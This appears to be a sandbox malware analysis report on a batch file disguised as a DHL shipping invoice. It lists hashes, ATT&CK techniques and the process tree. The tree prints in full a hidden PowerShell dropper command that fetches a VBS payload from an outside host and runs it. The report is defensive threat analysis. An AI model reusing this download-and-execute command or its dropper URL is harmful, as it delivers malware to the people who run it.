cc96717b14c851a477981e752753bc595dc13713fe222a6d361b0ec15e3fdbc3

Analysis

max time kernel
16s
max time network
17s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
16-10-2024 07:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DHL_Shipping_Invoices_Awb_000000000101520242247820020031808174Global180030010152024.bat
Size

542B
MD5

415f82e7ccaa07c5907805687a010209
SHA1

b9816a469c59fafb92b921a75bebecb9935277ad
SHA256

ef6cf434471b7ab9a035d09dcf5c5685e7c38afc6301b337c9531bfdae73bb83
SHA512

2f51a1a91dd6c86f00d7c3076ba8f1883ac714dc5d0f875f6ed38aa2ccc74511af6a6d848e01da56041c3e4cbad1bf8ac025a6b413369e1bd9e0446f7e144753

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://in-houselegal.ro/YwDS3/calculators.vbs

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2352	powershell.exe
6	2352	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2352	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2412	cmd.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2352	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2352	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 2352	2412	cmd.exe	30
PID 2412 wrote to memory of 2352	2412	cmd.exe	30
PID 2412 wrote to memory of 2352	2412	cmd.exe	30
PID 2352 wrote to memory of 2384	2352	powershell.exe	31
PID 2352 wrote to memory of 2384	2352	powershell.exe	31
PID 2352 wrote to memory of 2384	2352	powershell.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_000000000101520242247820020031808174Global180030010152024.bat"
1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$OLUMG; $GLUFD = (New-Object Net.WebClient);$GLUFD.Encoding = [System.Text.Encoding]::UTF8;$OLUMG = $GLUFD.DownloadString( 'https://in-houselegal.ro/YwDS3/calculators.vbs' );$OLUMG = $GLUFD.DownloadString( $OLUMG ) ;$Hglgp = [System.IO.Path]::GetTempPath() + '\x.vbs';$OLUMG | Out-File -FilePath $Hglgp; wscript.exe //nologo $Hglgp"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2352
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" //nologo C:\Users\Admin\AppData\Local\Temp\\x.vbs
    3⤵
    PID:2384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\x.vbs

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
memory/2352-4-0x000007FEF5B1E000-0x000007FEF5B1F000-memory.dmp

Filesize
4KB

Download
memory/2352-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/2352-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2352-7-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-8-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-9-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-10-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-11-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-12-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-15-0x000007FEF5860000-0x000007FEF61FD000-memory.dmp

Filesize
9.6MB

Download